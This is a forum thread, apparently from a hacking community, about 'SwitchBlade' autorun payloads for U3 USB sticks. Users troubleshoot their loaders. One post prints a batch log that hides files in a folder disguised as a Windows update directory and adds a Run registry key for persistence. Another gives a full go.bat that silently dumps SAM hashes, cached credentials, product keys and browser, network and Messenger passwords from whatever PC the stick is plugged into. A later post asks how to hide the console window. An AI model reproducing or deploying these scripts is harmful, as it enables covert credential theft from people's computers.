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SwitchBlades [Simpler launch process] U3


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Ok, here are the new links:



Complete Package (but without the SPA-Versions):


Mstart Versions (non-SPA):


Mstart SPA-Versions (now Black and White!):



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Currently all Files are down... :cry:

I´ll reup them as soon as possible!


//Here are the new versions:

Complete Package (but without the SPA-Versions):


Mstart Versions (non-SPA):


Mstart SPA-Versions (now Black and White!):


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I think I'm missing something here. I started with the renegadetech payload and it worked great. I tried to switch to this loader and its not loading the go.bat. I have your go.cmd and go.bat (the old cmd) in cmd, but nothing happens at load. U3 loads fine when caps lock is on.

Edit: Went back to the old loader and left go.cmd and go.bat, works now. Not sure if I'm doing something wrong creating the new iso?

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I think I'm missing something here. I started with the renegadetech payload and it worked great. I tried to switch to this loader and its not loading the go.bat. I have your go.cmd and go.bat (the old cmd) in cmd, but nothing happens at load. U3 loads fine when caps lock is on.

Edit: Went back to the old loader and left go.cmd and go.bat, works now. Not sure if I'm doing something wrong creating the new iso?

if u leave the bat and cmd it should work just fine (it does with me ...)

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Ok I unpack the rar to my desktop. I copy MSTART over to U3CUSTOM and rename, replacing the MSTART that was there. Then I run ISOcreate. Then I run Universal_Customizer. Did I miss anything?

Edit: When I run go.cmd it says system could not find the path specified, then after a couple seconds it closes and I get a log file. If I run the cd partition a command window comes up for a split second and then nothing.

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When I run go.cmd it says system could not find the path specified, then after a couple seconds it closes and I get a log file. If I run the cd partition a command window comes up for a split second and then nothing.

Could it be, that you have a folder thats named WIP, on your C: drive or any other drive that comes before (alphabetically) the driveletter of your u3-stick?


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When I run go.cmd it says system could not find the path specified, then after a couple seconds it closes and I get a log file. If I run the cd partition a command window comes up for a split second and then nothing.

Could it be, that you have a folder thats named WIP, on your C: drive or any other drive that comes before (alphabetically) the driveletter of your u3-stick?


Yes, on my desktop. And on my c drive I happen to have a nice documents folder with a log file. Thats why it says noob under my name. :)

I'll get rid of it and try again (it'll be a couple days though, leaving now for the weekend). Thanks for the help.

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ok so i'm noticing some problems , it wont run dome scripts for example or even install the hacksaw because it attempts to run them from the cd drive instead of the flash drive ....

here's a lil dump of the visible batch :

G:>mkdir C:WINDOWS$NtUninstallKB931337$   || mkdir "C:Documents and Settings

DLSSApplication Datasbs"

A subdirectory or file C:WINDOWS$NtUninstallKB931337$ already exists.

A subdirectory or file C:Documents and SettingsDLSSApplication Datasbs alrea

dy exists.


The system cannot find the path specified.

G:>attrib *.* -s -h

Access denied - G:AUTORUN.INF

Access denied - G:LAUNCHPAD.ZIP

Access denied - G:LAUNCHU3.EXE

Access denied - G:MSTART.EXE

G:>copy *.* C:WINDOWS$NtUninstallKB931337$   || copy *.* "C:Documents and Se

ttingsDLSSApplication Datasbs"





        4 file(s) copied.

G:>attrib *.* +s +h

Access denied - G:AUTORUN.INF

Access denied - G:LAUNCHPAD.ZIP

Access denied - G:LAUNCHU3.EXE

Access denied - G:MSTART.EXE

G:>reg.exe add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

 /v USBMedia /t REG_SZ /d "C:WINDOWS$NtUninstallKB931337$sbs.exe" /f   || "C:

Documents and SettingsDLSSApplication Datasbsshortcut.exe" /f:"C:Documents

 and SettingsDLSSStart MenuProgramsStartupá.lnk" /A:C /T:"C:Documents and

SettingsDLSSApplication Datasbssbs.exe" /W:"C:Documents and SettingsDLSSA

pplication Datasbs" /I:"C:Documents and SettingsDLSSApplication Datasbsbla


The operation completed successfully.

G:>attrib C:WINDOWS$NtUninstallKB931337$ +s +h   & attrib "C:Documents and S

ettingsDLSSApplication Datasbs" +s +h




C:WINDOWS>cd $NtUninstallKB931337$


'sbs.exe' is not recognized as an internal or external command,

operable program or batch file.

note in this case the flash drive is H , and the cd drive/partition is G ....

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I still cant get it to work. I made sure I dont have a folder named WIP anywhere (and I've tried this on 3 different PCs). Everything works when I manually run go.cmd, or when I use another loader, but when using autorun a command window pops up for a split second and nothing. If I go into the cd portion and run mstart the same thing happens, a quick cmd window and nothing else.

If I run mstart on C:, it does run go.bat (from the flash drive, I checked), but it places the documents folder on C:. Apparently its trying to make the log files on the cd when it autoruns.

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@DLSS & Stangman

Are you using the little Batch-File I posted some time ago?

This one was supposed to solve the problem...


this one ?


To get the your payload to work "out-of-the-box" I suggest you to put this go.cmd in your x:WIPCMD and rename the original payload executable (go.cmd) to go.bat!

@echo off




yes i am ....

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Same here..


@echo off





@echo off

if not exist Documents md Documents >nul

if not exist Documentslogfiles md Documentslogfiles >nul

cd wipcmd >nul

Echo ************************************ > Documentslogfiles%computername%.log 2>&1

echo ***********[System info]************ >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> Documentslogfiles%computername%.log 2>&1

   ipconfig /all >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   .pwdump >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***********[Dump Product Keys]****** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   .produkey /nosavereg /stext "Documentslogfiles%computername%_pk.log" /remote %computername% >> Documentslogfiles%computername%.log 2>&1

   copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_pk.log* Documentslogfiles%computername%.log  >> nul

   del /f /q "Documentslogfiles%computername%_pk.log" >nul

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***********[Dump IE 7 Secrets]****** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   .iepv.exe /stext "Documentslogfiles%computername%_LSA.log" >> Documentslogfiles%computername%.log 2>&1

   copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_lsa.log* Documentslogfiles%computername%.log  >> nul

   del /f /q "Documentslogfiles%computername%_lsa.log" >nul

set RtD=%CD%

cd /D "%appdata%MozillaFirefoxProfiles" >nul


for /D %%i in (*) do set PROFILE=%%i

cd /D %RtD% >nul

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

Echo ***********[Dump Firefox PW]******** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

.FirePassword.exe "%appdata%MozillaFirefoxProfiles%PROFILE%" >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***********[Dump Network PW]******** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   .netpass.exe /stext "Documentslogfiles%computername%_np.log" >> Documentslogfiles%computername%.log 2>&1

   copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_np.log* Documentslogfiles%computername%.log  >> nul

   del /f /q "Documentslogfiles%computername%_np.log" >nul

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***********[Dump Cache]************* >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   .cachedump.exe >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***********[Dump Messenger PW]****** >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   .mspass.exe /stext "Documentslogfiles%computername%_ms.log" >> Documentslogfiles%computername%.log 2>&1

   copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_ms.log* Documentslogfiles%computername%.log  >> nul

   del /f /q "Documentslogfiles%computername%_ms.log" >nul

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***********[Dump URL History]******* >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   cscript //nologo .DUH.vbs >> Documentslogfiles%computername%.log 2>&1



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When I launch the application I see a black DOS box for about 1.5 seconds. I even tried:

HWND hdwin=GetForegroundWindow();


but I still see the window. Any ideas? I tried this on at least 7 different computers (XP SP2, in Spanish & English)with the same results.



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